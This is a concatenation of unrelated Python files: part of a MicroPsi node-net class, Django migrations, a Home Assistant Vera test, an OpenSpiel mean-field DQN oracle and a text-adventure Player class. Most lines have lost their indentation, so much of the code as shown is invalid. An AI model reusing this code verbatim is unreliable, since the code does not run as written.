node = self._nodes[node_uid]
node.unlink_completely()
parent_nodespace = self._nodespaces.get(self._nodes[node_uid].parent_nodespace)
parent_nodespace._unregister_entity('nodes', node_uid)
parent_nodespace.contents_last_changed = self.current_step
if self._nodes[node_uid].type == "Activator":
parent_nodespace.unset_activator_value(self._nodes[node_uid].get_parameter('type'))
del self._nodes[node_uid]
self._track_deletion('nodes', node_uid)
def delete_nodespace(self, nodespace_uid):
self._nodespace_ui_properties.pop(nodespace_uid, None)
self.delete_node(nodespace_uid)
def clear(self):
super().clear()
self._nodes = {}
self.initialize_nodenet({})
def _register_node(self, node):
self._nodes[node.uid] = node
node.last_changed = self.current_step
self.get_nodespace(node.parent_nodespace).contents_last_changed = self.current_step
if node.type not in STANDARD_NODETYPES:
self.native_module_instances[node.uid] = node
def _register_nodespace(self, nodespace):
self._nodespaces[nodespace.uid] = nodespace
nodespace.last_changed = self.current_step
self.get_nodespace(nodespace.parent_nodespace).contents_last_changed = self.current_step
    def merge_data(self, nodenet_data, keep_uids=False, uidmap=None, **_):
        """merges the nodenet state with the current node net, might have to give new UIDs to some entities"""
        if uidmap is None:
            uidmap = {}
# merge in spaces, make sure that parent nodespaces exist before children are initialized
nodespaces_to_merge = set(nodenet_data.get('nodespaces', {}).keys())
for nodespace in nodespaces_to_merge:
self.initialize_nodespace(nodespace, nodenet_data['nodespaces'])
invalid_nodes = []
# merge in nodes
for uid in nodenet_data.get('nodes', {}):
data = nodenet_data['nodes'][uid]
if not keep_uids:
newuid = self.generate_uid("nodes")
else:
newuid = uid
data['uid'] = newuid
uidmap[uid] = newuid
if data['type'] not in self.nodetypes and data['type'] not in self.native_modules:
self.logger.error("Invalid nodetype %s for node %s" % (data['type'], uid))
invalid_nodes.append(uid)
continue
self._nodes[newuid] = DictNode(self, **data)
# merge in links
links = nodenet_data.get('links', [])
if isinstance(links, dict):
# compatibility
links = links.values()
for link in links:
if link['source_node_uid'] in invalid_nodes or link['target_node_uid'] in invalid_nodes:
continue
try:
self.create_link(
uidmap[link['source_node_uid']],
link['source_gate_name'],
uidmap[link['target_node_uid']],
link['target_slot_name'],
link['weight']
)
except ValueError:
self.logger.warning("Invalid link data")
for monitorid in nodenet_data.get('monitors', {}):
data = nodenet_data['monitors'][monitorid]
if 'node_uid' in data:
old_node_uid = data['node_uid']
if old_node_uid in uidmap:
data['node_uid'] = uidmap[old_node_uid]
if 'classname' in data:
if hasattr(monitor, data['classname']):
mon = getattr(monitor, data['classname'])(self, **data)
self._monitors[mon.uid] = mon
else:
self.logger.warning('unknown classname for monitor: %s (uid:%s) ' % (data['classname'], monitorid))
def step(self):
"""perform a calculation step"""
with self.netlock:
self._step += 1
for operator in self.stepoperators:
operator.execute(self, self._nodes.copy(), self.netapi)
steps = sorted(list(self.deleted_items.keys()))
if steps:
for i in steps:
if i >= self.current_step - 100:
break
else:
del self.deleted_items[i]
self.user_prompt_response = {}
def create_node(self, nodetype, nodespace_uid, position, name="", uid=None, parameters=None, gate_configuration=None):
nodespace_uid = self.get_nodespace(nodespace_uid).uid
if nodetype in self.native_modules:
if name is None or name == "" or name == uid:
name = nodetype
node = DictNode(
self,
nodespace_uid,
position, name=name,
type=nodetype,
uid=uid,
parameters=parameters,
gate_configuration=gate_configuration)
return node.uid
def create_nodespace(self, parent_uid, name="", uid=None, options=None):
parent_uid = self.get_nodespace(parent_uid).uid
nodespace = DictNodespace(self, parent_uid, name=name, uid=uid)
return nodespace.uid
def get_node(self, uid):
return self._nodes[uid]
def get_nodespace(self, uid):
if uid is None:
uid = "Root"
return self._nodespaces[uid]
def get_node_uids(self, group_nodespace_uid=None, group=None):
if group is not None:
if group_nodespace_uid is None:
group_nodespace_uid = self.get_nodespace(None).uid
return [n.uid for n in self.nodegroups[group_nodespace_uid][group][0]]
else:
return list(self._nodes.keys())
def get_nodespace_uids(self):
return list(self._nodespaces.keys())
def is_node(self, uid):
return uid in self._nodes
def is_nodespace(self, uid):
return uid in self._nodespaces
def set_node_positions(self, positions):
""" Sets the position of nodes or nodespaces """
for uid in positions:
if uid in self._nodes:
self._nodes[uid].position = positions[uid]
def get_nativemodules(self, nodespace=None):
"""Returns a dict of native modules. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
nativemodules = {}
for uid in nodes:
if self._nodes[uid].type not in STANDARD_NODETYPES:
nativemodules.update({uid: self._nodes[uid]})
return nativemodules
def get_activators(self, nodespace=None, type=None):
"""Returns a dict of activator nodes. OPtionally filtered by the given nodespace and the given type"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
activators = {}
for uid in nodes:
if self._nodes[uid].type == 'Activator':
if type is None or type == self._nodes[uid].get_parameter('type'):
activators.update({uid: self._nodes[uid]})
return activators
def get_sensors(self, nodespace=None, datasource=None):
"""Returns a dict of all sensor nodes. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
sensors = {}
for uid in nodes:
if self._nodes[uid].type == 'Sensor':
if datasource is None or self._nodes[uid].get_parameter('datasource') == datasource:
sensors[uid] = self._nodes[uid]
return sensors
def get_actuators(self, nodespace=None, datatarget=None):
"""Returns a dict of all actuator nodes. Optionally filtered by the given nodespace"""
nodes = self._nodes if nodespace is None else self._nodespaces[nodespace].get_known_ids('nodes')
actuators = {}
for uid in nodes:
if self._nodes[uid].type == 'Actuator':
if datatarget is None or self._nodes[uid].get_parameter('datatarget') == datatarget:
actuators[uid] = self._nodes[uid]
return actuators
def set_link_weight(self, source_node_uid, gate_type, target_node_uid, slot_type, weight=1):
"""Set weight of the given link."""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False
link = source_node.link(gate_type, target_node_uid, slot_type, weight)
if link is None:
return False
else:
return True
def create_link(self, source_node_uid, gate_type, target_node_uid, slot_type, weight=1):
"""Creates a new link.
        Arguments:
source_node_uid: uid of the origin node
gate_type: type of the origin gate (usually defines the link type)
target_node_uid: uid of the target node
slot_type: type of the target slot
weight: the weight of the link (a float)
        Returns:
            True if the link was created,
            (False, None) if the source node does not exist
"""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False, None
source_node.link(gate_type, target_node_uid, slot_type, weight)
return True
def delete_link(self, source_node_uid, gate_type, target_node_uid, slot_type):
"""Delete the given link."""
source_node = self.get_node(source_node_uid)
if source_node is None:
return False, None
source_node.unlink(gate_type, target_node_uid, slot_type)
return True
def construct_modulators_dict(self):
"""
Returns a new dict containing all modulators
"""
return self._modulators.copy()
def get_standard_nodetype_definitions(self):
"""
Returns the standard node types supported by this nodenet
"""
return copy.deepcopy(STANDARD_NODETYPES)
def group_nodes_by_names(self, nodespace_uid, node_name_prefix=None, gatetype="gen", sortby='id', group_name=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if nodespace_uid not in self.nodegroups:
self.nodegroups[nodespace_uid] = {}
if group_name is None:
group_name = node_name_prefix
nodes = self.netapi.get_nodes(nodespace_uid, node_name_prefix)
if sortby == 'id':
nodes = sorted(nodes, key=lambda node: node.uid)
elif sortby == 'name':
nodes = sorted(nodes, key=lambda node: node.name)
self.nodegroups[nodespace_uid][group_name] = (nodes, gatetype)
def group_nodes_by_ids(self, nodespace_uid, node_uids, group_name, gatetype="gen", sortby=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if nodespace_uid not in self.nodegroups:
self.nodegroups[nodespace_uid] = {}
nodes = []
for node_uid in node_uids:
node = self.get_node(node_uid)
if node.parent_nodespace != nodespace_uid:
raise ValueError("Node %s is not in nodespace %s" % (node_uid, nodespace_uid))
nodes.append(node)
if sortby == 'id':
nodes = sorted(nodes, key=lambda node: node.uid)
elif sortby == 'name':
nodes = sorted(nodes, key=lambda node: node.name)
self.nodegroups[nodespace_uid][group_name] = (nodes, gatetype)
def ungroup_nodes(self, nodespace_uid, group):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group in self.nodegroups[nodespace_uid]:
del self.nodegroups[nodespace_uid][group]
def get_activations(self, nodespace_uid, group):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
activations = []
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for node in nodes:
activations.append(node.get_gate(gate).activation)
return activations
def set_activations(self, nodespace_uid, group, new_activations):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for i in range(len(nodes)):
nodes[i].set_gate_activation(gate, new_activations[i])
def get_gate_configurations(self, nodespace_uid, group, gatefunction_parameter=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
data = {'gatefunction': set()}
if gatefunction_parameter:
data['parameter_values'] = []
for node in nodes:
config = node.get_gate_configuration(gate)
data['gatefunction'].add(config['gatefunction'])
if gatefunction_parameter is not None:
data['parameter_values'].append(config['gatefunction_parameters'].get(gatefunction_parameter, 0))
if len(data['gatefunction']) > 1:
raise RuntimeError("Heterogenous gatefunction configuration")
data['gatefunction'] = data['gatefunction'].pop()
return data
def set_gate_configurations(self, nodespace_uid, group, gatefunction, gatefunction_parameter=None, parameter_values=None):
if nodespace_uid is None:
nodespace_uid = self.get_nodespace(None).uid
if group not in self.nodegroups[nodespace_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group, nodespace_uid))
nodes = self.nodegroups[nodespace_uid][group][0]
gate = self.nodegroups[nodespace_uid][group][1]
for i in range(len(nodes)):
parameter = {}
if gatefunction_parameter:
parameter[gatefunction_parameter] = parameter_values[i]
nodes[i].set_gate_configuration(gate, gatefunction, parameter)
def get_link_weights(self, nodespace_from_uid, group_from, nodespace_to_uid, group_to):
if nodespace_from_uid is None:
nodespace_from_uid = self.get_nodespace(None).uid
if nodespace_to_uid is None:
nodespace_to_uid = self.get_nodespace(None).uid
if group_from not in self.nodegroups[nodespace_from_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_from, nodespace_from_uid))
if group_to not in self.nodegroups[nodespace_to_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_to, nodespace_to_uid))
rows = []
to_nodes = self.nodegroups[nodespace_to_uid][group_to][0]
to_slot = self.nodegroups[nodespace_to_uid][group_to][1]
from_nodes = self.nodegroups[nodespace_from_uid][group_from][0]
from_gate = self.nodegroups[nodespace_from_uid][group_from][1]
for to_node in to_nodes:
row = []
for from_node in from_nodes:
links = from_node.get_gate(from_gate).get_links()
hit = None
for link in links:
if link.target_node == to_node and link.target_slot.type == to_slot:
hit = link
break
if hit is not None:
                    row.append(hit.weight)
else:
row.append(0)
rows.append(row)
return rows
def set_link_weights(self, nodespace_from_uid, group_from, nodespace_to_uid, group_to, new_w):
if nodespace_from_uid is None:
nodespace_from_uid = self.get_nodespace(None).uid
if nodespace_to_uid is None:
nodespace_to_uid = self.get_nodespace(None).uid
if group_from not in self.nodegroups[nodespace_from_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_from, nodespace_from_uid))
if group_to not in self.nodegroups[nodespace_to_uid]:
raise ValueError("Group %s does not exist in nodespace %s" % (group_to, nodespace_to_uid))
to_nodes = self.nodegroups[nodespace_to_uid][group_to][0]
to_slot = self.nodegroups[nodespace_to_uid][group_to][1]
from_nodes = self.nodegroups[nodespace_from_uid][group_from][0]
from_gate = self.nodegroups[nodespace_from_uid][group_from][1]
if type(new_w) == int and new_w == 1:
if len(from_nodes) != len(to_nodes):
raise ValueError("from_elements and to_elements need to have equal lengths for identity links")
for i in range(len(to_nodes)):
self.set_link_weight(
from_nodes[i].uid,
from_gate,
to_nodes[i].uid,
to_slot,
1
)
else:
for row in range(len(to_nodes)):
to_node = to_nodes[row]
for column in range(len(from_nodes)):
from_node = from_nodes[column]
weight = new_w[row][column]
if weight != 0:
self.set_link_weight(from_node.uid, from_gate, to_node.uid, to_slot, weight)
else:
self.delete_link(from_node.uid, from_gate, to_node.uid, to_slot)
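    # Illustration (made-up group names, not original code): for a gate-side group
    # "layer1" and a slot-side group "layer2" of two nodes each, new_w is indexed
    # as [to_row][from_column]:
    #     nodenet.set_link_weights(None, "layer1", None, "layer2",
    #                              [[0.5, 0.0],
    #                               [0.0, 0.7]])
    # sets the two non-zero links and deletes any existing zero-weight links.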
def get_available_gatefunctions(self):
"""
Returns a dict of the available gatefunctions and their parameters and parameter-defaults
"""
import inspect
from micropsi_core.nodenet import gatefunctions
data = {}
for name, func in inspect.getmembers(gatefunctions, inspect.isfunction):
sig = inspect.signature(func)
data[name] = {}
skip = True
for key in sig.parameters:
if skip:
# first param is input_activation. skip
skip = False
continue
default = sig.parameters[key].default
if default == inspect.Signature.empty:
default = None
data[name][key] = default
return data
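    # Illustration (hypothetical gatefunction, not asserting the real module's API):
    # a function defined as
    #     def threshold(input_activation, minimum=0, maximum=1): ...
    # would be reported here as {'threshold': {'minimum': 0, 'maximum': 1}}.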
def has_nodespace_changes(self, nodespace_uids=[], since_step=0):
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
for nodespace_uid in nodespace_uids:
if self.get_nodespace(nodespace_uid).contents_last_changed >= since_step:
return True
return False
def get_nodespace_changes(self, nodespace_uids=[], since_step=0, include_links=True):
result = {
'nodes_dirty': {},
'nodespaces_dirty': {},
'nodes_deleted': [],
'nodespaces_deleted': []
}
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
else:
nodespace_uids = [self.get_nodespace(uid).uid for uid in nodespace_uids]
for i in range(since_step, self.current_step + 1):
if i in self.deleted_items:
result['nodespaces_deleted'].extend(self.deleted_items[i].get('nodespaces_deleted', []))
result['nodes_deleted'].extend(self.deleted_items[i].get('nodes_deleted', []))
for nsuid in nodespace_uids:
for uid in self.get_nodespace(nsuid).get_known_ids():
if uid not in result['nodes_deleted'] and self.is_node(uid):
if self.get_node(uid).last_changed >= since_step:
result['nodes_dirty'][uid] = self.get_node(uid).get_data(include_links=include_links)
if include_links:
for assoc in self.get_node(uid).get_associated_node_uids():
if self.get_node(assoc).parent_nodespace not in nodespace_uids and assoc not in result['nodes_dirty']:
result['nodes_dirty'][assoc] = self.get_node(assoc).get_data(include_links=include_links)
elif uid not in result['nodespaces_deleted'] and self.is_nodespace(uid):
if self.get_nodespace(uid).last_changed >= since_step:
result['nodespaces_dirty'][uid] = self.get_nodespace(uid).get_data()
return result
def get_dashboard(self):
data = super(DictNodenet, self).get_dashboard()
link_uids = []
node_uids = self.get_node_uids()
data['count_nodes'] = len(node_uids)
data['count_positive_nodes'] = 0
data['count_negative_nodes'] = 0
data['nodetypes'] = {"NativeModules": 0}
data['concepts'] = {
'checking': 0,
'verified': 0,
'failed': 0,
'off': 0
}
data['schemas'] = {
'checking': 0,
'verified': 0,
'failed': 0,
'off': 0,
'total': 0
}
for uid in node_uids:
node = self.get_node(uid)
link_uids.extend(node.get_associated_links())
if node.type in STANDARD_NODETYPES:
if node.type not in data['nodetypes']:
data['nodetypes'][node.type] = 1
else:
data['nodetypes'][node.type] += 1
else:
data['nodetypes']['NativeModules'] += 1
if node.activation > 0:
data['count_positive_nodes'] += 1
elif node.activation < 0:
data['count_negative_nodes'] += 1
if node.type == 'Pipe':
if node.get_gate('gen').activation == 0 and node.get_gate('sub').activation > 0 and len(node.get_gate('sub').get_links()):
data['concepts']['checking'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['checking'] += 1
elif node.get_gate('sub').activation > 0 and node.activation > 0.5:
data['concepts']['verified'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['verified'] += 1
elif node.activation < 0:
data['concepts']['failed'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['failed'] += 1
else:
data['concepts']['off'] += 1
if node.get_gate('sur').get_links() == []:
data['schemas']['off'] += 1
data['concepts']['total'] = sum(data['concepts'].values())
data['schemas']['total'] = sum(data['schemas'].values())
data['modulators'] = self.construct_modulators_dict()
data['count_links'] = len(set(link_uids))
return data
|
# Generated by Django 4.0.3 on 2022-03-17 07:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='question',
name='question_desc',
field=models.TextField(default='', null=True),
),
]
|
# Generated by Django 2.0.5 on 2018-06-11 17:17
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
dependencies = [
('paikkala', '0005_program_automatic_max_tickets'),
]
operations = [
migrations.CreateModel(
name='PerProgramBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('excluded_numbers', models.CharField(blank=True, help_text='seat numbers to block from this row in this program', max_length=128, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blocks', to='paikkala.Program')),
('row', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='paikkala.Row')),
],
),
]
|
"""Vera tests."""
from unittest.mock import MagicMock
from pyvera import VeraBinarySensor
from homeassistant.core import HomeAssistant
from .common import ComponentFactory
async def test_binary_sensor(
hass: HomeAssistant, vera_component_factory: ComponentFactory
) -> None:
"""Test function."""
vera_device = MagicMock(spec=VeraBinarySensor) # type: VeraBinarySensor
vera_device.device_id = 1
vera_device.name = "dev1"
vera_device.is_tripped = False
entity_id = "binary_sensor.dev1_1"
component_data = await vera_component_factory.configure_component(
hass=hass, devices=(vera_device,)
)
controller = component_data.controller
update_callback = controller.register.call_args_list[0][0][1]
vera_device.is_tripped = False
update_callback(vera_device)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == "off"
controller.register.reset_mock()
vera_device.is_tripped = True
update_callback(vera_device)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == "on"
controller.register.reset_mock()
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from open_spiel.python import policy
from open_spiel.python import rl_environment
from open_spiel.python.jax import dqn
from open_spiel.python.mfg.algorithms import distribution
from open_spiel.python.mfg.algorithms import nash_conv
from open_spiel.python.mfg.algorithms import policy_value
class DQNPolicies(policy.Policy):
"""Joint policy to be evaluated."""
def __init__(self, envs, policies):
game = envs[0].game
player_ids = list(range(game.num_players()))
super(DQNPolicies, self).__init__(game, player_ids)
self._policies = policies
self._obs = {
"info_state": [None] * game.num_players(),
"legal_actions": [None] * game.num_players()
}
def action_probabilities(self, state, player_id=None):
cur_player = state.current_player()
legal_actions = state.legal_actions(cur_player)
self._obs["current_player"] = cur_player
self._obs["info_state"][cur_player] = (state.observation_tensor(cur_player))
self._obs["legal_actions"][cur_player] = legal_actions
info_state = rl_environment.TimeStep(
observations=self._obs, rewards=None, discounts=None, step_type=None)
p = self._policies[cur_player].step(info_state, is_evaluation=True).probs
prob_dict = {action: p[action] for action in legal_actions}
return prob_dict
class MFGRLOracle(object):
def __init__(self,
mfg_game,
best_response_class,
best_response_kwargs,
number_training_episodes,
eval_period,
use_checkpoints=False,
checkpoint_dir=None):
self._mfg_game = mfg_game
    self._num_players = mfg_game.num_players()
self._use_checkpoints = use_checkpoints
self._eval_period = eval_period
self._checkpoint_dir = checkpoint_dir
self._best_response_class = best_response_class
self._best_response_kwargs = best_response_kwargs
self._num_train_episodes = number_training_episodes
    # keep the uniform policy and its distribution on the instance so that
    # training() can refer to them later (they were previously undefined there)
    self._uniform_policy = policy.UniformRandomPolicy(mfg_game)
    self._mfg_dist = distribution.DistributionPolicy(mfg_game, self._uniform_policy)
self._envs = [
        rl_environment.Environment(mfg_game, distribution=self._mfg_dist, mfg_population=p)
for p in range(self._num_players)
]
self._info_state_size = self._envs[0].observation_spec()["info_state"][0]
self._num_actions = self._envs[0].action_spec()["num_actions"]
self._agents = [
dqn.DQN(idx, self._info_state_size, self._num_actions, **self._best_response_kwargs)
for idx in range(self._num_players)
]
self._joint_avg_policy = DQNPolicies(self._envs, self._agents)
# if use_checkpoints:
# for agent in agents:
# if agent.has_checkpoint(checkpoint_dir):
# agent.restore(checkpoint_dir)
def training(self, distributions):
for ep in range(self._num_train_episodes):
# Training monitoring
if (ep + 1) % self._eval_period == 0:
losses = [agent.loss for agent in self._agents]
logging.info("Losses: %s", losses)
        nash_conv_obj = nash_conv.NashConv(self._mfg_game, self._uniform_policy)
print(
str(ep + 1) + " RL Best Response to Uniform " +
str(nash_conv_obj.br_values()))
        pi_value = policy_value.PolicyValue(self._mfg_game, self._mfg_dist, self._joint_avg_policy)
print(
str(ep + 1) + " DQN Best Response to Uniform " + str([
pi_value.eval_state(state)
for state in self._mfg_game.new_initial_states()
]))
if self._use_checkpoints:
for agent in self._agents:
agent.save(self._checkpoint_dir)
logging.info("_____________________________________________")
# Training for one episode.
for player in range(self._num_players):
time_step = self._envs[player].reset()
while not time_step.last():
agent_output = self._agents[player].step(time_step)
action_list = [agent_output.action]
time_step = self._envs[player].step(action_list)
# Episode is over, step all agents with final info state.
self._agents[player].step(time_step)
def __call__(self, game, distributions):
"""
Call the RL oracle to find the best response strategy for each player.
:param game: A MFG.
:param distributions: the MFG distribution an agent best responds to.
:return:
"""
for player in range(self._num_players):
self._envs[player]._distribution = distributions[player]
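# Usage sketch (illustrative, not from the original code): a fictitious-play style
# driver could wire the oracle up roughly like this; ``dqn_kwargs`` and
# ``some_policy`` are placeholders.
#
#     oracle = MFGRLOracle(game, dqn.DQN, dqn_kwargs,
#                          number_training_episodes=1000, eval_period=100)
#     dists = [distribution.DistributionPolicy(game, some_policy)
#              for _ in range(game.num_players())]
#     oracle(game, dists)       # point each env at the current distribution
#     oracle.training(dists)    # train the per-player DQN best responses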
|
"""
textgame.player
=====================
This module contains a class :class:`textgame.player.Player` that is used to define
what a player is able to do in the game. Every of its methods that get called by
:class:`textgame.parser.Parser` must take a noun (string) as an argument and return
either a string that describes the action or a :class:`textgame.parser.EnterYesNoLoop`.
For convenience, this module provides wrappers for Player methods:
- :func:`textgame.player.player_method`
- :func:`textgame.player.action_method`
"""
from inspect import signature
from collections import OrderedDict
import random
import logging
logger = logging.getLogger("textgame.player")
logger.addHandler(logging.NullHandler())
from textgame.globals import DIRECTIONS, MOVING, INFO, ACTION, LIGHT, DESCRIPTIONS
from textgame.globals import FIGHTING
from textgame.parser import EnterYesNoLoop
def player_method(f):
"""wrapper for player methods
checks if the method has the right signature, adds a dummy argument if the method doesn't care about nouns. Throws :class:`TypeError` if there are too many arguments.
"""
func = f
# check signature of f
n_args = len(signature(f).parameters)
if n_args == 1:
# add a dummy argument
def _f(self, noun):
return f(self)
func = _f
# preserve (but change) docstring
func.__doc__ = "decorated by :func:`textgame.player.player_method`\n\n"\
+ (f.__doc__ if f.__doc__ else "")
elif n_args > 2:
raise TypeError("Action methods can't have more than 2 arguments")
return func
def action_method(f):
"""wrapper for player methods
does the same as :func:`textgame.player.player_method` plus it adds to the return
value of the original function the output of :func:`textgame.world.World.update`.
This way it is guaranteed that time passes and fights get managed when the player
does something.
Also, this saves the undecorated function in a new attribute ``f.undecorated``.
"""
func = player_method(f)
# append self.world.update to the end of every method
def _f(self, noun):
msg = func(self, noun)
if type(msg) is str:
# the other possibility is EnterYesNoLoop
msg += self.world.update(self)
return msg
# save the undecorated function
# reason: one might want to call action_methods from other action_methods,
# in this case nested decorations lead to bugs bc of multiple calls
# on world.update
_f.undecorated = f
# preserve (but change) docstring
_f.__doc__ = "decorated by :func:`textgame.player.action_method`\n\n"\
+ (f.__doc__ if f.__doc__ else "")
return _f
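# A minimal sketch (not part of the original module) of how the wrappers are meant
# to be used; ``Wizard`` and ``meditate`` are made-up names:
#
#     class Wizard(Player):
#         @action_method
#         def meditate(self):            # takes no noun ...
#             return "You feel calm."    # ... player_method adds a dummy noun
#                                        # argument and action_method appends the
#                                        # result of world.update(self)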
class Player:
"""class to represent the player of the game
- holds an instance of :class:`textgame.world.World` so that its methods can have the widest possible impact on the game
- ``self.location`` contains the room the player is currently in, ``self.oldlocation`` contains the previous location
- ``self.inventory`` is a dict mapping the item's IDs to the items the player is carrying
- ``self.status`` tracks the player's status: ``{"alive": True, "fighting": False, "trapped": False}``
"""
def __init__(self, world, initlocation):
self.location = initlocation
self.oldlocation = None
# player must know of the whole world so that he can
# move to other places quickly (eg.)
self.world = world
self.score = 0
self.age = 0 # TODO: maybe this is redundant with world.time
# dict to contain all the items the player is carrying
self.inventory = OrderedDict()
self.status = {"alive": True, "fighting": False, "trapped": False}
self.random = random.Random()
logger.debug("seeding player with {}".format(self.world.seed+42))
self.random.seed(self.world.seed+42)
@action_method
def go(self, direction):
"""
change location to the room in the direction ``noun``. ``noun`` can be
        in :class:`textgame.globals.DIRECTIONS` or 'back'. On any other input, return
        :class:`textgame.globals.MOVING.FAIL_NOT_DIRECTION`
"""
if direction == "back":
return self.goback()
elif not direction:
return MOVING.FAIL_WHERE
elif direction not in DIRECTIONS:
return MOVING.FAIL_NOT_DIRECTION
# this line is in player.cpp but it makes no sense?
# self.location.check_restrictions(self)
if self.status["trapped"]:
return MOVING.FAIL_TRAPPED
elif self.status["fighting"]:
# running away from a fight will kill player
self.status["alive"] = False
return MOVING.DEATH_BY_COWARDICE
else:
destination = self.location.doors[direction]
# see if there is a door
if destination:
# see if door is open
if not self.location.locked[direction]["closed"]:
# how does moving to this direction look like?
dir_description = self.location.dir_descriptions[direction]
# move, but remember previous room
self.oldlocation = self.location
self.location = destination
# spawn monsters before describing the room
self.world.spawn_monster(destination)
                    # check if the room is dark etc., plus any special cases
msg = self.location.check_restrictions(self)
# if the room is not dark, add dir_description to the beginning
if not self.location.dark["now"] and dir_description:
msg = dir_description + '\n' + msg
msg += self.location.describe()
if not self.location.visited:
self.score += self.location.visit()
return msg
else:
return MOVING.FAIL_DOOR_LOCKED
else:
return self.location.errors[direction]
def goback(self):
"""
change location to previous location if there's a connection
"""
if self.oldlocation == self.location:
return MOVING.FAIL_NO_MEMORY
# maybe there's no connection to oldlocation
        if self.oldlocation not in self.location.doors.values():
return MOVING.FAIL_NO_WAY_BACK
else:
# find in which direction oldlocation is
for dir,dest in self.location.doors.items():
if dest == self.oldlocation:
direction = dir
break
return type(self).go.undecorated(self, direction)
@action_method
def close(self, direction):
"""
lock the door in direction ``noun`` if player has a key in inventory
that fits
"""
return self._close_or_lock("lock", direction)
@action_method
def open(self, direction):
"""
open the door in direction ``noun`` if player has a key in inventory
that fits
"""
return self._close_or_lock("open", direction)
def _close_or_lock(self, action, direction):
if direction not in DIRECTIONS:
return ACTION.FAIL_OPENDIR.format(action)
# check if there's a door
if not self.location.doors[direction]:
return MOVING.FAIL_NO_DOOR
# check if door is already open/closed
if action=="open" and not self.location.locked[direction]["closed"]:
return ACTION.ALREADY_OPEN
elif action=="lock" and self.location.locked[direction]["closed"]:
return ACTION.ALREADY_CLOSED
# check if there are any items that are keys
if any([i.key for i in self.inventory.values()]):
# get all keys and try them out
keys = [i for i in self.inventory.values() if i.key]
for key in keys:
if key.key == self.location.locked[direction]["key"]:
# open/close the door, depending on action
self.location.locked[direction]["closed"] = (action == "lock")
return ACTION.NOW_OPEN.format(action)
return ACTION.FAIL_OPEN
return ACTION.FAIL_NO_KEY
@action_method
def take(self, itemid):
"""
see if something with the ID ``noun`` is in the items of the current
location. If yes and if it's takable and not dark, remove it from location
and add it to inventory
"""
if not itemid:
return ACTION.WHICH_ITEM.format("take")
elif itemid == "all":
return self.takeall()
if self.location.dark["now"]:
return DESCRIPTIONS.DARK_S
if itemid in self.inventory:
return ACTION.OWN_ALREADY
item = self.location.items.get(itemid)
if item:
if item.takable:
# move item from location to inventory
self.inventory[itemid] = self.location.items.pop(itemid)
return ACTION.SUCC_TAKE.format(item.name)
return ACTION.FAIL_TAKE
elif itemid in self.location.description:
return ACTION.FAIL_TAKE
return ACTION.NO_SUCH_ITEM.format(itemid)
def takeall(self):
"""
move all items in the current location to inventory
"""
if not self.location.items:
return DESCRIPTIONS.NOTHING_THERE
if self.location.dark["now"]:
return DESCRIPTIONS.DARK_S
response = []
for itemid in list(self.location.items.keys()):
response.append(type(self).take.undecorated(self, itemid))
return '\n'.join(response)
@action_method
def list_inventory(self):
"""
return a pretty formatted list of what's inside inventory
"""
if self.inventory:
response = "You are now carrying:\n A "
response += '\n A '.join(i.name for i in self.inventory.values())
return response
return ACTION.NO_INVENTORY
@action_method
def drop(self, itemid):
"""
see if something with the ID ``noun`` is in the inventory. If yes, remove
it from inventory and add it to location
"""
if not itemid:
return ACTION.WHICH_ITEM.format("drop")
if itemid == "all":
return self.dropall()
        if itemid not in self.inventory:
return ACTION.FAIL_DROP
# move item from inventory to current room
        self.location.add_item(self.inventory.pop(itemid))
return ACTION.SUCC_DROP
def dropall(self):
"""
move all items in the inventory to current location
"""
if not self.inventory:
return ACTION.NO_INVENTORY
for item in list(self.inventory.keys()):
